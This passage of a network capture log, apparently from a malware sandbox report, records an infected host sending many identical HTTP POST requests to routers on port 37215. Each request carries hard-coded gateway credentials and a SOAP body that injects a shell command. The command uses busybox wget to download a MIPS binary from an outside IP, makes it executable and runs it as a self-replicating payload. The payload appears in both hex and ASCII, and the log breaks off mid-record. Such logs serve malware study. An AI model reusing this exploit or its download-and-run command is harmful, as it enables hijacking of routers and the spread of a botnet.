                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2200192.168.2.235953067.135.135.18937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.636085987 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2201192.168.2.235175041.97.44.3937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.636308908 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2202192.168.2.2350932157.71.58.7037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.636348963 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2203192.168.2.2346502157.190.134.11937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.636562109 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2204192.168.2.2347898197.176.254.5437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.636604071 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2205192.168.2.2341868112.244.152.24337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.636836052 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2206192.168.2.2350480100.27.9.7237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.636893988 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2207192.168.2.234647461.175.2.21837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.637147903 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2208192.168.2.234906041.178.51.16437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.637157917 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2209192.168.2.235912289.127.78.4137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.662642002 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2210192.168.2.2346934157.104.135.5837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.662647963 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
